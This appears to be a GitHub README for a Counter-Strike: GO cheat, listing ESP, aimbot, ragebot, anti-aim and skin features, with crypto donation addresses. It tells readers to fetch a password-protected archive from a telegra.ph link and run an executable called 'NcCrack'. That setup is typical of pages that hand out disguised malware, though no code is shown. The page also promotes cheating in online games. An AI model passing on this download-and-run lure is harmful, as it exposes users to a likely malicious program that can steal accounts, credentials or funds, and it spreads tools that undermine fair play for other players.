# CS-GO-HACK-ESP-AIM

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# FUNCTION

# VISUALS

- PLAYERS
- Name
- Line
- Direction
- Bone
- Hide Names
- Hitbox
- Aimpoint
- Warning
- Glow
- Dormant
- Weapon
- Health
- Chams
- Box

# LOCAL

- Crosshar
- Spread
- Grenade Helper
- Lag Indicator
- Thirdperson On Death
- Fake Model
- FOV
- Thirdperson
- YawIndicator
- Aim FOV

# FILTER

- Visible Only
- Firendly
- Local
- Damage
- Hitmarker
- Gray World
- No Flash
- No Smoke
- Transparent Props
- Colored Props
- Colored World
- Item
- Chams
- Tracers

# MISC

- Spectator
- Rank
- Radar
- Bomb Timer
- Backtrack Chams
- Sound
- ESP Distance
- Max Distance
- Arrows
- Radius

# SKINS

- Hands
- Glove Skin
- Knife
- ID 

# COLOR

- The ability to change the color anywhere

# LEGITBOT

- MAIN:
- Global Settings
- Auto Fire
- Aim Mode
- FOV
- Smooth
- Autowall
- Silent
- Safe Aim
- Sticky
- Smoke Check
- RCS
- RCS Type
- FOV
- Aimtype

# POSITION

- Priority
- Switches from head to legs
- Переключатели от head до legs

# ACCURACY

- Backtrack
- Ignore Jump
- Not Aim While Flashed
- Trigger Mode
- Trigger Delay
- Hitchance
- Min damage

# FACTORS

- Fire Rate
- Fire Delay
- Aim Time
- Aim Distance

# RAGEBOT

# MAIN

- Global Settings
- Active
- Aim Mode
- FOV
- Aim Step

# POSITION

- Priority
- Switches from head to legs
- Переключатели от head до legs

# ACCURACY

- Resolver
- Backtrack
- Fake Lag On Shot
- bAim Low Health
- bAim After Miss
- Auto Scope
- Movement
- Hitchance
- Min Damage

# MISC

# MAIN

- Anti Untrusted
- Legit AA
- Movement
- Hit Sound
- Knifebot
- Clantag
- Chat
- Name

# ANTIAIMS

- Pitch
- Yaw
- Type
- Fakelag
- Stand, Move, Inair

# BINDS

- Fakeduck Key
- bAim Switch Key
- Slowwalk Key

# SLOWWALK

- Slowwalk
- Factor

# CONFIG

- Load
- Save
- Add
- Remove

# PLAYERS

- The list of players

![S1DE0iU](https://user-images.githubusercontent.com/119938147/213409592-8ff03bfb-fde8-4ba2-93e7-d94609df92fd.gif)
